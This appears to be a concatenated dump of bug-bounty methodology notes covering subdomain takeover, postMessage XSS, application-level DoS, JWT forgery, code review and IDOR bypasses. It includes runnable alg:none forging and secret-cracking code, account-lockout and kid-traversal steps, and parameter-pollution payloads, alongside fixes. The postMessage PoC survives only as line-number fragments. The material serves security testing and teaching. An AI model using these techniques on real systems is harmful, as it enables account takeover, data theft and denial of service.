Signup to AWS -> head over to CloudFront signup
```
### Remediation
```
- Check your DNS configuration for subdomains pointing to services not in use.
- Set up your external service so it fully listens to your wildcard DNS.
In Heroku's case, this means running the following command in your app: heroku domains:add *.example.com
```
### Reference
- Detectify article: [https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/](https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/)
- Zsec Blog: [https://blog.zsec.uk/subdomainhijack/](https://blog.zsec.uk/subdomainhijack/)

### POC
```
- I found a website, for now call it www.target.com
- I went to the terminal and ran a host command on that target

host www.target.com

- it was pointing its 'A' record to this IP, 23.227.38.65
- Now I knew that this IP belongs to Shopify, because I had set up a shop on Shopify a few days back (you can also go and check the whois record for this IP)
- I opened the website www.target.com and found a Shopify template there stating "only one step left to finish setting" (in some cases it also states: Sorry this shop is unavailable)
- Now I knew what I had to do: I signed up on Shopify with a trial account, after that I put in the same target website name, it gave me an error stating the application name already exists, so I put target.com as the name, and finally it was created.
- I went to settings, it showed me two options, "connect your domain automatically" and "connect your domain manually"
- I chose the first, automatic one, just put in that domain www.target.com, and it got connected. We are done, now we own this top level domain.
```
### Analysis
```
- The person registered this domain name from GoDaddy and configured its DNS record pointing to the Shopify IP
- Either he might have forgotten to create a shop, or he had created a shop, used it for a while, then deleted that shop from Shopify but didn't remove the DNS entry pointing to Shopify's IP
```

** Pardon for any spelling or grammar mistake **

### Author:
- Twitter Id: @Zero0x00
--------------------------------------------------------------------------------
/XSS/post_message_xss.md:
--------------------------------------------------------------------------------
# **PostMessage XSS (Cross-Site Scripting) Vulnerability**

## **Introduction**
The `postMessage` API is widely used in modern web applications to enable cross-origin communication between different windows, iframes, and pop-ups. However, **if the receiving application does not properly validate the origin of incoming messages**, it may be vulnerable to **PostMessage XSS**.

This vulnerability allows attackers to send malicious data from an **untrusted source (e.g., sandboxed iframe, null origin, or malicious website)** to a trusted application, leading to **security risks such as data theft, session hijacking, and arbitrary JavaScript execution.**

---

## **How PostMessage Works**
The `window.postMessage()` function allows scripts running in one window to send messages to another window. The syntax is:

```javascript
window.postMessage(message, targetOrigin, [transfer]);
```

- `message`: The data to be sent to the target window.
- `targetOrigin`: A string specifying the expected origin of the recipient (use `"*"` to allow any origin, which is insecure).
- `transfer`: Optional, used for passing objects.
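`targetOrigin` protects the sender; the receiver has to protect itself, and that is where the origin check belongs. Here is an added example, not code from this page, of the receiving side done properly: the listener accepts messages only from an explicit allowlist of origins, checks the message shape, and writes the data as text rather than HTML. The receiver is assumed to live at `https://app.example.com`, the only trusted sender at `https://trusted-site.com`, and messages to be objects of the form `{ type: "status", text }`; the handler is factored around a sink so it can be exercised outside a browser.

```javascript
// Added example (not from the original page): a postMessage receiver with origin validation.
// Assumptions for the example: the receiver is https://app.example.com, the only legitimate
// sender is https://trusted-site.com, and messages look like { type: "status", text: "..." }.

const ALLOWED_ORIGINS = new Set(["https://trusted-site.com"]);

// Builds the "message" handler around a sink object so the logic can be tested without a DOM.
// In the browser the sink is a real element; in the test it is a plain object.
function createMessageHandler(sink, allowed = ALLOWED_ORIGINS) {
  return function onMessage(event) {
    // 1. Exact origin match. event.origin is filled in by the browser and cannot be chosen by
    //    the sender; a sandboxed iframe or a data: URL shows up as the string "null", which
    //    is not in the allowlist and is therefore rejected like any other origin.
    if (!allowed.has(event.origin)) {
      return { accepted: false, reason: `origin not allowed: ${event.origin}` };
    }
    // 2. Shape check: only the fields we expect, only as strings.
    const d = event.data;
    if (typeof d !== "object" || d === null || d.type !== "status" || typeof d.text !== "string") {
      return { accepted: false, reason: "unexpected message shape" };
    }
    // 3. Write as text. Even a trusted sender can be compromised, so the data never reaches
    //    innerHTML; markup in it is rendered literally.
    sink.textContent = d.text;
    return { accepted: true };
  };
}

// Browser wiring (skipped when the file is run under Node for the test).
if (typeof window !== "undefined" && typeof document !== "undefined") {
  window.addEventListener("message", createMessageHandler(document.body));
}

// Sender side at https://trusted-site.com, for comparison with the page's example: name the
// receiver's origin instead of "*", so the browser drops the message if the target window has
// since navigated elsewhere.
function sendStatus(targetWindow, text) {
  targetWindow.postMessage({ type: "status", text }, "https://app.example.com");
}
```

Two details matter in review: the comparison is `Set.has` on the full origin, not `startsWith` or `includes` (which would accept `https://trusted-site.com.attacker.example`), and `"null"` is never added to the allowlist, because any page can produce that origin with a sandboxed iframe.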
20 | 21 | Example of secure usage: 22 | ```javascript 23 | window.postMessage("data", "https://trusted-site.com"); 24 | ``` 25 | 26 | --- 27 | 28 | ## **Vulnerability: Improper Origin Validation** 29 | If an application listens for `postMessage` events **without verifying the sender’s origin**, an attacker can exploit this by crafting a malicious message from an unauthorized source. 30 | 31 | ### **Example of an Insecure Implementation** 32 | ```javascript 33 | window.addEventListener("message", function (event) { 34 | // No origin validation 35 | document.body.innerHTML = event.data; 36 | }); 37 | ``` 38 | **Security Issue:** 39 | - The application directly processes any received message without verifying the sender's origin. 40 | - If an attacker sends a malicious payload (e.g., JavaScript injection), it can lead to XSS. 41 | 42 | ### **Exploitation Scenario** 43 | 1. The vulnerable website listens for messages using `postMessage`, but **does not check the sender’s origin**. 44 | 2. An attacker hosts a malicious page and sends a **crafted message** to the vulnerable application. 45 | 3. The malicious script gets executed inside the vulnerable website, leading to **DOM-based XSS**. 46 | 47 | --- 48 | 49 | ## **Exploiting PostMessage XSS** 50 | 51 | ### **Proof of Concept (PoC)** 52 | The following PoC demonstrates how an attacker can inject malicious JavaScript into a vulnerable application by exploiting a poorly validated `postMessage` request. 53 | 54 | ```html 55 | 56 | 57 | 58 | 59 | PostMessage XSS PoC 60 | 66 | 67 | 68 |
Click to Exploit
```

### **Breakdown of the Attack**
- The script opens the target **vulnerable website** in a new window (`window.open()`).
- It **sends a malicious payload** via `postMessage()` that contains an XSS injection.
- If the receiving `message` handler **does not check `event.origin`** against an allowlist and passes `event.data` into a sink such as `innerHTML` or `eval()`, the payload executes, giving **arbitrary JavaScript execution** in the target's origin.

---

## **Impact of PostMessage XSS**
An attacker exploiting this vulnerability can:
- **Execute malicious JavaScript** on the vulnerable application.
- **Steal sensitive data** such as session tokens, authentication credentials, or user inputs.
- **Modify page content** or inject phishing links.
- **Act inside the trusted origin**, so the Same-Origin Policy no longer separates the attacker's page from the victim's session.
- **Deliver the payload from a hidden iframe** instead of a popup, since `postMessage()` reaches `iframe.contentWindow` just as well, which makes the attack invisible to the victim.

---
*Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
-------------------------------------------------------------------------------- /Application_Level_DoS/ALD_Methods.md: --------------------------------------------------------------------------------

## 1. Email Bounce Issues
- Check if the application has an invite functionality.
- Try sending invites to invalid (non-existent) email addresses.
- Identify the email service provider, such as AWS SES, HubSpot or Campaign Monitor.
**Note: You can identify the email service provider from the headers of an email the application sends you (`Received`, `Return-Path`, `X-Mailer`, the DKIM `d=` domain).**
* Once you know the provider, check its hard bounce limits. Limits for some of them:

**1. HubSpot hard bounces:** HubSpot's hard bounce limit is 5%. For reference, many ISPs prefer bounce rates to be under 2%.

**2. AWS SES:** SES places an account under review when its bounce rate reaches about 5% and may pause sending altogether at 10%.

***Impact: Once the hard bounce limit is reached, the email service provider throttles or blocks the company's sending, which means no emails (including password resets and OTPs) reach legitimate users.***

On a bug bounty target, do not actually push the bounce rate over the limit: demonstrate the missing address validation and the absence of rate limiting on invites, and let the program confirm its provider's thresholds.

## 2. Long Password DoS Attack

- Passwords are hashed before being stored. If there is no limit on the password length, the server spends CPU time hashing an arbitrarily long input, and a handful of concurrent requests can exhaust it. Whether this bites depends on the hasher: bcrypt truncates its input at 72 bytes, so the cost does not grow, whereas PBKDF2 and scrypt process the whole input and implementations such as Django's before CVE-2013-1443 (fixed by capping passwords at 4096 bytes) could be made to spend seconds on a single request.

**How to test?**

- Submit a password of around 150-200 characters to check whether a length restriction exists.
- If there is none, increase the length step by step (1,000, 5,000, 10,000 characters) and watch the response time at each step.
- Record whether response time grows with length and whether the endpoint times out or starts returning 5xx. A single slow response is not a finding; a reproducible growth curve is.

**Where to test?**

- The registration password field is usually length-restricted, but the forgot-password (set new password) page and the change-password form for an authenticated user are frequently missing the limit.


## 3. Long String DoS

* When a string field is set so long that the server cannot process it within its limits, it can sometimes cause a denial of service.

**How to test**
```
Create an account (A) and set a field such as username, address or even the profile picture filename parameter (see the second reference) to a string of around 1,000 characters or more.
From a second account (B), search for, view or list account A.
```
- Either the search keeps running for a long time,
- or the application crashes (HTTP 500).


## Use Password From Password.txt
⚠️ `It is not recommended to use more than 5,000 characters as a password.`
- Here is the [Password.txt](https://raw.githubusercontent.com/KathanP19/HowToHunt/master/Application_Level_DoS/Password.txt)

## 4. Permanent DoS to Victim
This is not application-level DoS but a permanent (account lockout) DoS against a victim.
Some websites block a user after a number of failed logins. We will turn this feature into a bug :D

**How to check**
- Go to the login page of example.com.
- Enter a valid account email and a wrong password.
- Repeat the login attempt a number of times (at least 10-20); you can use Repeater or Intruder in Burp Suite.
- If the account gets blocked, check the blocking period. If it is longer than 30 minutes, you can report it.

**Points to Remember**
- Make sure there is no CAPTCHA on the login form, otherwise the request cannot be replayed by a tool.
- Check whether the victim's existing sessions are invalidated once the account is blocked.

**What is the priority of this bug?**
- If the user is permanently blocked after some wrong attempts, this is considered P2.
- If the user is temporarily blocked, this is considered P3/P4.

When reporting, show the impact by explaining that an attacker can keep the victim locked out indefinitely by repeating the failed logins at intervals shorter than the lockout period. A lockout that applies only to the attacker's own IP or device, rather than to the victim's account, is not a finding.


## Reference :
\- Email Bounce Issues
* [https://medium.com/bugbountywriteup/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68](https://medium.com/bugbountywriteup/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68)

\- Long Password DoS Attack

- https://www.acunetix.com/vulnerabilities/web/long-password-denial-of-service/
- https://hackerone.com/reports/738569
- https://hackerone.com/reports/167351

\- Long String DOS
- [https://medium.com/@shahjerry33/long-string-dos-6ba8ceab3aa0](https://medium.com/@shahjerry33/long-string-dos-6ba8ceab3aa0)
- https://hackerone.com/reports/764434

\- Permanent DOS to victim
- https://youtu.be/5drIMXCQuNw

## Author:
* [Keshav Malik](https://twitter.com/g0t_rOoT_)
* [Fani Malik](https://twitter.com/fanimalikhack)

-------------------------------------------------------------------------------- /JWT/OLD_JWT_ATTACK_Notes.md: --------------------------------------------------------------------------------
# JWT Attack
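The notes in this file cover alg:none, algorithm confusion and weak-secret attacks. Before the notes, here is an added, runnable illustration written for this page (it is not code from the original notes or from any JWT library): it signs an HS256 token with the Python standard library, forges an alg:none variant, shows a naive verifier that honours the token's own `alg` accepting the forgery while a strict verifier rejects it, and recovers a deliberately weak secret from a tiny wordlist. The secret `secret123`, the claims and the wordlist are constructed for the demo.

```python
"""Added example (not from the HowToHunt notes): forge and verify JWTs with the
standard library only, to show why the attacks described in these notes work.
Constructed demo data: secret, claims and wordlist are made up."""
import base64
import hashlib
import hmac
import json
from typing import Dict, List, Optional


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    signing_input = f"{_compact(header)}.{_compact(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_none(token: str, new_claims: dict) -> str:
    """alg:none attack: rewrite the header, edit the claims, drop the signature."""
    _, payload_b64, _ = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(new_claims)
    return f"{_compact({'alg': 'none', 'typ': 'JWT'})}.{_compact(payload)}."


def verify_naive(token: str, secret: bytes) -> Optional[Dict]:
    """Vulnerable: trusts whatever 'alg' the attacker put in the header."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg", "").lower() == "none":
        return json.loads(b64url_decode(payload_b64))   # no signature check at all
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return json.loads(b64url_decode(payload_b64))
    return None


def verify_strict(token: str, secret: bytes) -> Optional[Dict]:
    """Hardened: the server fixes the algorithm; the header is data, not config."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":          # exact match, no case games
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def brute_force_secret(token: str, wordlist: List[str]) -> Optional[str]:
    """Offline HS256 secret recovery: the symmetric verify key is also the signing key."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    target = b64url_decode(sig_b64)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


# Constructed demo data
SECRET = b"secret123"
HEADER = {"alg": "HS256", "typ": "JWT"}
PAYLOAD = {"loggedInAs": "user", "iat": 1422779638}
WORDLIST = ["password", "admin", "jwt", "secret123", "letmein"]

if __name__ == "__main__":
    token = sign_hs256(HEADER, PAYLOAD, SECRET)
    forged = forge_none(token, {"loggedInAs": "admin"})
    print("naive verifier accepts alg:none forgery:", verify_naive(forged, SECRET))
    print("strict verifier rejects it:", verify_strict(forged, SECRET))
    print("recovered secret:", brute_force_secret(token, WORDLIST))
```

The strict verifier is the whole fix: the algorithm and key are chosen server-side, `none` is never an option, and a missing signature fails before any comparison. Real libraries expose this as an `algorithms=[...]` allowlist; leaving it unset is what the attacks below exploit.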

### FIRST, IF YOU DON'T KNOW WHAT A JWT IS, READ AND WATCH THE RESOURCES BELOW
-----------------------------------------------------------------------
* https://twitter.com/BHinfoSecurity/status/1299743624553549825?s=09
* https://youtu.be/ghfmx4pr1Qg (very beginner friendly)
* https://medium.com/ag-grid/a-plain-english-introduction-to-json-web-tokens-jwt-what-it-is-and-what-it-isnt-8076ca679843
* https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a
* https://anubhav-singh.medium.com/get-a-feel-of-jwt-json-web-token-8ee9c16ce5ce
* https://anubhav-singh.medium.com/attacks-on-json-web-token-jwt-278a49a1ad2e
* Cheat Sheet - [Pentester's Lab](https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf)

### NOTES FOR ATTACKING JWT
* What the heck is this?!
```
1. A JSON Web Token is a signed (or, less often, encrypted) token that carries claims, most commonly used as a stateless session/authentication token.
2. It consists of three base64url-encoded parts separated by dots: header, payload, signature.
```
---------------------------------------------------------------------------------
* Header
```json
{
  "alg": "HS256",
  "typ": "JWT"
}
```
-------------------------------------------------------------------
* Payload
```json
{
  "loggedInAs": "admin",
  "iat": 1422779638
}
```
-----------------------------------------------------------------------------
* Signature
```
HMAC-SHA256
(
  secret,
  base64urlEncoding(header) + '.' + base64urlEncoding(payload)
)
```
The payload is only base64url-encoded, not encrypted: anyone holding the token can read it, and the signature is the only thing stopping them from changing it.
-----------------------------------------------
* Changing alg to none
* Example
```json
{
  "alg": "none",
  "typ": "JWT"
}
```
Remove the signature but keep the trailing dot, so the token ends with `.`.
Libraries that normalise the value carelessly may also accept `None`, `NONE` or `nOne`.
-------------
* Change the payload like
```json
{
  "loggedInAs": "admin",
  "iat": 1422779638
}
```
* Here change the user to admin.
----------------------------------------------------
# SOME MORE TIPS AND METHODS
--------------------------------------------------------
1. Base64url-decode the full token, or each part separately, and read the header and claims.
2. Change the payload using the JSON Web Token Burp extension.
3. Algorithm confusion: change `RS256` to `HS256` and sign the token with the server's RSA public key used as the HMAC secret. If the library picks the verification routine from the token's `alg`, the same public key now verifies the forgery.
4. Signature not checked: remove it or tamper with it and see whether the token is still accepted.
5. Brute-force the secret when `alg` is HS256. HS256 is symmetric, so the one secret that verifies the token is the same secret that signs it; a weak secret recovered offline (jwtcat, jwt_tool, hashcat mode 16500) lets you mint tokens at will.
---------------------------------------------------------------------------------------------------
### Other Easy Method
```
1) Create an account
2) Inspect the token
3) Base64url-decode the header
4) If there is a "kid" (key ID) parameter, it tells the server which key to verify with, and it is attacker-controlled input
5) If the kid is used to build a file path, try directory traversal through it
6) Point kid at a file whose contents you can predict (an empty file such as /dev/null, for example) and sign the token with those contents as the HMAC secret
7) Change the payload to {"user":"admin"}
8) Write a short script that builds the forged token
9) Send the token and reload the page
10) Done
```
---
# TOOLS TO USE
-----------------------------------------------------------------------------------------------
* [JSON Web Token Attacker Burp extension](https://github.com/portswigger/json-web-token-attacker)
* Base64 decoder
* jwt.io to analyse the structure of a token (do not paste live production tokens into third-party sites)
* jwtcat for weak HS256 secrets: [jwtcat](https://github.com/aress31/jwtcat)
* Tool for validating, forging, scanning and tampering with JWTs: [jwt_tool](https://github.com/ticarpi/jwt_tool)
* Tool to test the security of JSON Web Tokens: [jwtXploiter](https://github.com/DontPanicO/jwtXploiter)

---------------------------------------------------------------------------------------------------------------------------
### SOURCES:
- Interesting blog - [Medium](https://barrymalone.medium.com/json-web-tokens-beginner-exploitation-5a44f8f6efff)
* YouTube, Medium, GitHub, Google
### Author
* [Naman Shah](https://twitter.com/naman_1910)
* [@kAshhadali10](https://twitter.com/kAshhadali10)
* [@0xrtt](https://twitter.com/0xrtt)
* [Anubhav Singh](https://twitter.com/AnubhavSingh_)
-------------------------------------------------------------------------------- /Web_Source_Review/codereviewtips.md: --------------------------------------------------------------------------------
# Code review:-

By performing a source code review we can find web application vulnerabilities that are hard to reach from the outside.


### 1. Important functions first
------------------------------------
When reading source code,
focus on important functions such as authentication, password reset, state-changing actions and sensitive info reads.
(What is most important depends on the application.)
Then, review how these components interact with other functionality.
Finally, audit the less sensitive parts of the application.

### 2. Follow user input
------------------------------

Another approach is to follow the code that processes user input.
User input such as HTTP request parameters, HTTP headers, HTTP request paths, database entries, file reads, and
file uploads provide the entry points for attackers to exploit the application's vulnerabilities. Tracing each of them to the sink it reaches
helps find critical vulnerabilities like XXE, XSS and SQL injection.

### 3. Hardcoded secrets and credentials:
-------------------------------------------------------
Hardcoded secrets such as API keys, encryption keys and database passwords can be easily discovered during a
source code review. You can grep for keywords such as "key", "secret", "password", "encrypt" or regex search
for hex or base64 strings (depending on the key format in use). Check the commit history too: a secret removed in a later commit is still a live secret until it is rotated.

### 4. Use of dangerous functions and outdated dependencies:
----------------------------------------------------------------------------------
Unchecked use of dangerous functions and outdated dependencies are a huge source of bugs.
Grep for the specific functions of the language in use and compare the dependency versions list against known-vulnerable versions to
see if they are outdated.

### 5. Developer comments, hidden debug functionalities, configuration files, and the .git directory:
-----------------------------------------------------------------------------------------------------------------------
These are things that developers often forget about, and they leave the application in a dangerous state.
Developer comments can point out obvious programming mistakes, hidden debug functionalities often lead to
privilege escalation, config files allow attackers to gather more information about your infrastructure and finally,
an exposed .git directory allows attackers to reconstruct your source code.
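As an added example (not part of the original tips), here is a small scanner that automates the grep-style checks from tips 3 and 4 above and the weak-algorithm terms from tip 7 below. The regexes and the sample source are constructed for the demo; the dangerous-call list is Python-flavoured and should be swapped for the language under review.

```python
"""Added example (not from the original code-review tips): a minimal source
scanner for hard-coded secrets, dangerous calls and weak crypto primitives.
Patterns and SAMPLE_SOURCE are constructed for the demo."""
import re
from typing import Dict, List, Tuple

# Tip 3: keyword-based secret assignment, plus long hex / base64 literals.
# No leading \b so that 'db_password' and 'API_KEY' both match.
SECRET_ASSIGNMENT = re.compile(
    r"(?i)(api[_-]?key|secret|password|passwd|token|private[_-]?key)\w*\s*[:=]\s*[\"']([^\"']{8,})[\"']")
HEX_LITERAL = re.compile(r"[\"']([0-9a-fA-F]{32,})[\"']")
BASE64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{40,}={0,2})[\"']")

# Tip 4: dangerous sinks (Python-flavoured; swap per language).
DANGEROUS_CALLS = re.compile(r"\b(eval|exec|pickle\.loads|os\.system|subprocess\.Popen|yaml\.load)\s*\(")

# Tip 7: weak primitives. Lookarounds treat '_' and '.' as boundaries so MODE_ECB
# and hashlib.md5( match while 'describe' or a hex blob containing 'ecb' do not.
WEAK_CRYPTO = re.compile(r"(?i)(?<![a-z0-9])(md4|md5|sha1|des|rc4|ecb)(?![a-z0-9])")


def scan_source(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_no, category, snippet) for every line that trips a pattern."""
    findings = []
    for no, line in enumerate(lines, start=1):
        snippet = line.strip()
        if SECRET_ASSIGNMENT.search(line):
            findings.append((no, "hardcoded-secret", snippet))
        elif HEX_LITERAL.search(line) or BASE64_LITERAL.search(line):
            findings.append((no, "suspicious-literal", snippet))
        if DANGEROUS_CALLS.search(line):
            findings.append((no, "dangerous-call", snippet))
        if WEAK_CRYPTO.search(line):
            findings.append((no, "weak-crypto", snippet))
    return findings


def summarize(findings: List[Tuple[int, str, str]]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for _, category, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


# Constructed sample source with deliberate findings on lines 2, 3, 5, 6, 7, 8
SAMPLE_SOURCE = [
    "import hashlib, pickle",
    "API_KEY = 'AKIAEXAMPLEKEY1234567890'",
    "db_password = 'correct horse battery'",
    "def load(blob):",
    "    return pickle.loads(blob)",
    "digest = hashlib.md5(data).hexdigest()",
    "cipher = AES.new(key, AES.MODE_ECB)",
    "SESSION_SALT = '3f786850e387550fdab836ed7e6dc881de23001b'",
    "result = safe_compute(x)",
]

if __name__ == "__main__":
    for no, category, snippet in scan_source(SAMPLE_SOURCE):
        print(f"{no:>3} [{category}] {snippet}")
```

Run it over `git grep -n` output or a file list and triage by category; the secret and literal patterns are deliberately noisy, so treat them as a starting point for manual review rather than as verdicts.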
40 | 41 | ### 6.Hidden paths, deprecated endpoints, and endpoints in development: 42 | ----------------------------------------------------------------------------------------------------- 43 | These are endpoints that users might not encounter when using the application normally. But if they work and 44 | they are discovered by an attacker, it can lead to vulnerabilities such as authentication bypass and sensitive 45 | information leak, depending on the exposed endpoint. 46 | 47 | 48 | 49 | ### 7.Weak cryptography or hashing algorithms: 50 | ----------------------------------------------------------------------------------------------------------------------- 51 | This is an issue that is hard to find during a black-box test, but easy to spot when reviewing source code. 52 | Look for issues such as weak encryption keys, breakable encryption algorithms, and weak hashing algorithms. 53 | Grep for terms like ECB, MD4, and MD5. 54 | 55 | ### 8.Missing security checks on user input and regex strength: 56 | ----------------------------------------------------------------------------------------------------- 57 | Reviewing source code is a great way to find out what kind of security checks are missing. 58 | Read through the application’s documentation and test all the edge cases that you can think of. 59 | A great resource for what kind of edge cases that you should consider is PayloadsAllTheThings.(github) 60 | 61 | ### 9.Missing cookie flags: 62 | ----------------------------------------------------------------- 63 | Look out for missing cookie flags such as httpOnly and secure. 64 | 65 | 66 | ### 10.Unexpected behavior, conditionals, unnecessarily complex and verbose functions: 67 | -------------------------------------------------------------------------------------------------------------------- 68 | Additionally, pay special attention to the application’s unexpected behavior, conditionals, and complex functions. 
These locations are where obscure bugs are often discovered.

### Authors
* [@harsha0x01](https://twitter.com/harsha0x01)
-------------------------------------------------------------------------------- /IDOR/IDOR-Old.md: --------------------------------------------------------------------------------
## Testing for IDOR/Broken object level authorization:

Difficulty: Easy

Tips: Don't blindly test by changing numbers until you hit PII; tools can do this for you.

**Finding IDOR Attack Vectors Ideas:**

1. What do they use for authorization? (JWT, API keys, cookies, tokens) Tip: find this out by replacing a high-privilege authorization value with a lower-privilege one and seeing what the server responds with.
2. Understand how they use IDs, hashes, and their API. Do this by looking at the API documentation if they have one.

***Every time you see a new API endpoint that receives an object ID from the client, ask yourself the following questions:***

- Does the ID belong to a private resource? (e.g. /api/user/123/news vs /api/user/123/transaction)
- What are the IDs that belong to me?
- What are the different possible roles in the API? (For example: user, driver, supervisor, manager)

## Bypassing Object Level Authorization:

- Add parameters onto the endpoints, for example:

```http
GET /api_v1/messages --> 401
vs
GET /api_v1/messages?user_id=victim_uuid --> 200
```

- HTTP Parameter Pollution (which duplicate the server reads depends on the framework: first, last, or both)

```http
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK

GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
```

- Add .json to the endpoint if it is built with Ruby on Rails; the format suffix can route to a responder with different checks than the HTML one:

```http
/user_data/2341 --> 401 Unauthorized
/user_data/2341.json --> 200 OK
```

- Test on outdated API versions

```http
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
```

* Wrap the ID in an array.

```
{"id":111} --> 401 Unauthorized
{"id":[111]} --> 200 OK
```

* Wrap the ID in a JSON object:

```
{"id":111} --> 401 Unauthorized

{"id":{"id":111}} --> 200 OK
```

* JSON Parameter Pollution (duplicate keys: when two components parse the body differently, for example a gateway keeping the first key and the backend the last, the authorization check and the lookup see different IDs):

```http
POST /api/get_profile
Content-Type: application/json
{"user_id":ATTACKER_ID,"user_id":VICTIM_ID}
```

- Try sending a wildcard (`*`) instead of an ID. It's rare, but sometimes it works.
- If it is a numeric ID, test across a large range of numbers instead of just guessing a few.
- If an endpoint is named like /api/users/myinfo, check for /api/admins/myinfo.
- Swap the request method (GET/POST/PUT/PATCH/DELETE); authorization is sometimes enforced on one method only.
- Use the Burp extension Autorize.
- If none of these work, get creative and ask around!

## Escalating/Chaining IDOR Ideas:

1. Say you find a low-impact IDOR, like changing someone else's display name: chain it with XSS and you have stored XSS on their account.
2. If you find an IDOR on an endpoint that requires a UUID, chain it with an info-disclosure endpoint that leaks UUIDs and the "unguessable ID" defence is gone.
3. If none of these work, get creative and ask around!
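Added example, not part of the original notes: a generator that turns the bypass list above into concrete request variants that can be fed to Burp Repeater, Autorize-style two-session comparison, or a replay script. The endpoint `/api/v3/users_data/1234`, the parameter name `user_id` and the IDs 1111/2222 are made up.

```python
"""Added example (not from the original IDOR notes): build the request variants
from the bypass checklist for one baseline request. Endpoint, parameter and IDs
are constructed placeholders."""
import json
import re
from typing import Any, Dict, List
from urllib.parse import urlencode


def idor_variants(method: str, path: str, param: str, attacker_id: Any, victim_id: Any) -> List[Dict[str, Any]]:
    variants: List[Dict[str, Any]] = []

    def add(name: str, m: str = method, p: str = path, query: Dict = None, body: str = None) -> None:
        variants.append({"name": name, "method": m, "path": p,
                         "query": urlencode(query, doseq=True) if query else "",
                         "body": body})

    # Query-string probes: extra parameter, HPP in both orders, array syntax, wildcard
    add("plain victim id", query={param: victim_id})
    add("HPP attacker first", query={param: [attacker_id, victim_id]})
    add("HPP victim first", query={param: [victim_id, attacker_id]})
    add("HPP array syntax", query={f"{param}[]": [attacker_id, victim_id]})
    add("wildcard", query={param: "*"})

    # JSON body probes. The duplicate-key body is built by hand: json.dumps would merge the keys.
    add("json array wrap", m="POST", body=json.dumps({param: [victim_id]}))
    add("json object wrap", m="POST", body=json.dumps({param: {param: victim_id}}))
    add("json duplicate key", m="POST",
        body=f'{{"{param}":{json.dumps(attacker_id)},"{param}":{json.dumps(victim_id)}}}')

    # Path probes: swap a trailing numeric ID, add the Rails .json suffix, walk back API versions
    if re.search(r"/\d+$", path):
        add("path id swapped", p=re.sub(r"/\d+$", f"/{victim_id}", path))
        add("path id + .json", p=re.sub(r"/\d+$", f"/{victim_id}.json", path))
    for m in re.finditer(r"/v(\d+)/", path):
        current = int(m.group(1))
        for older in range(1, current):
            add(f"older api version v{older}", p=path.replace(f"/v{current}/", f"/v{older}/"),
                query={param: victim_id})

    # Method swapping on the plain probe
    for other in ("GET", "POST", "PUT", "PATCH", "DELETE"):
        if other != method:
            add(f"method {other}", m=other, query={param: victim_id})
    return variants


if __name__ == "__main__":
    for v in idor_variants("GET", "/api/v3/users_data/1234", "user_id", 1111, 2222):
        print(f"{v['name']:<26} {v['method']:<6} {v['path']}?{v['query']} {v['body'] or ''}")
```

Replay every variant with the attacker's session and diff the status code and body length against the baseline; a 200 where the baseline gave 401/403, or a body containing the victim's data, is the finding. Run the same set with no session at all to catch endpoints that only check authorization for logged-in users.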
86 | 87 | ### Reference 88 | [https://twitter.com/swaysThinking/status/1301663848223715328](https://twitter.com/swaysThinking/status/1301663848223715328) 89 | 90 | ### Reports (Hackerone) 91 | 92 | #### Resolved 93 | 94 | - [IDOR to delete images from other stores](https://hackerone.com/reports/404797) 95 | - [IDOR in changing shared file name](https://hackerone.com/reports/547663) 96 | - [User uploaded portfolio files can be accessed by any user even after deleted](https://hackerone.com/reports/300179) 97 | - [IDOR and statistics leakage in Orders](https://hackerone.com/reports/544329) 98 | - [I.D.O.R To Order,Book,Buy,reserve On YELP FOR FREE (UNAUTHORIZED USE OF OTHER USER'S CREDIT CARD)](https://hackerone.com/reports/391092) 99 | - [IDOR allow access to payments data of any user](https://hackerone.com/reports/751577) 100 | - [IDOR allow to extract all registered email](https://hackerone.com/reports/302485) 101 | - [IDOR at https://account.mackeeper.com/at/load-reports/profile/ leaks information about devices/licenses](https://hackerone.com/reports/783117) 102 | - [IDOR bug to See hidden slowvote of any user even when you dont have access right](https://hackerone.com/reports/661978) 103 | - [IDOR on update user preferences](https://hackerone.com/reports/854290) 104 | - [idor on upload profile functionality](https://hackerone.com/reports/741683) 105 | - [IDOR to view User Order Information](https://hackerone.com/reports/287789) 106 | - [IDOR with Geolocation data not stripped from images](https://hackerone.com/reports/906907) 107 | - 